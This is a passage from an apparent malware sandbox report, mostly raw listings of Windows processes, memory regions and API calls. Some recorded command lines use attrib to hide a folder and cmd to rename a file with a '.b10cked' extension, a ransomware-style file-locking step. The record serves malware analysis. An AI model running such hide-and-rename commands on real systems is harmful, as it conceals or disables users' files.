AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19885 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19886 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19887 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19888 start_va = 0xd0000 end_va = 0x10ffff 
entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 19889 start_va = 0x9f0000 end_va = 0x9f6fff entry_point = 0x9f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19890 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19891 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19892 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19893 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 19894 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19895 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19896 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19897 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19898 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 19899 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 
region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 19900 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19901 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19902 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19903 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19904 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19905 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19906 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19907 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19908 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = 
mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19909 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19910 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19911 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19912 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 19913 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19914 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 304 os_tid = 0xa18 Process: id = "242" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b60" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "240" os_parent_pid = "0xc28" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated 
Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20000 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20001 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20002 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20003 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 20004 start_va = 0x4f0000 end_va = 0x4f6fff entry_point = 0x4f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 20005 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20006 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20007 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20008 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 20009 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20010 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20011 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20012 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20013 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 20014 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 20015 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 20016 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20017 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 20018 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20019 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20020 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file 
name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 20021 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20022 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20023 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20024 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 20025 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20026 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20027 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20028 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20029 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
"c:\\windows\\system32\\msctf.dll") Thread: id = 305 os_tid = 0xca8 Process: id = "243" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b40" os_pid = "0x300" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "240" os_parent_pid = "0xc28" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20030 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20031 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20032 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20033 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 20034 start_va = 0xec0000 end_va = 0xec6fff entry_point = 0xec0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 20035 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20036 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = 
mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20037 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20038 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 20039 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20040 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20041 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20042 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 20043 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20044 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 20045 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 20046 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20047 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file 
name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 20048 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20049 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20050 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 20051 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20052 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20053 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20054 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 20055 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20056 start_va = 0x7f6f0000 end_va = 0x7f7effff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20057 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 20058 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20059 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 306 os_tid = 0xce8 Process: id = "244" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0xbec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20143 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20144 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20145 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20146 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 20147 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20148 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20149 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20150 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20151 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 20152 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20300 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20301 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20302 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20303 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private 
name = "private_0x00000000002e0000" filename = "" Region: id = 20304 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 20305 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20306 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20307 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20308 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20309 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20310 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20311 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20312 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
"c:\\windows\\system32\\gdi32.dll") Region: id = 20313 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20314 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 20315 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20316 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20317 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20318 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 20319 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 20320 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 20321 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 20322 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 20323 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 307 os_tid = 0xc38 [0152.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fa34 | out: 
lpSystemTimeAsFileTime=0x24fa34*(dwLowDateTime=0x949c9740, dwHighDateTime=0x1d440a9)) [0152.125] GetCurrentProcessId () returned 0xbec [0152.125] GetCurrentThreadId () returned 0xc38 [0152.125] GetTickCount () returned 0x2ef2e [0152.125] QueryPerformanceCounter (in: lpPerformanceCount=0x24fa2c | out: lpPerformanceCount=0x24fa2c*=20891459365) returned 1 [0152.126] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0152.126] __set_app_type (_Type=0x1) [0152.126] __p__fmode () returned 0x76b331f4 [0152.126] __p__commode () returned 0x76b331fc [0152.126] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0152.126] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0152.127] GetCurrentThreadId () returned 0xc38 [0152.127] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc38) returned 0x38 [0152.127] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.127] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0152.127] SetThreadUILanguage (LangId=0x0) returned 0x409 [0152.127] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0152.127] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f9c4 | out: phkResult=0x24f9c4*=0x0) returned 0x2 [0152.127] VirtualQuery (in: lpAddress=0x24f9fb, lpBuffer=0x24f994, dwLength=0x1c | out: lpBuffer=0x24f994*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.127] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f994, dwLength=0x1c | out: lpBuffer=0x24f994*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, 
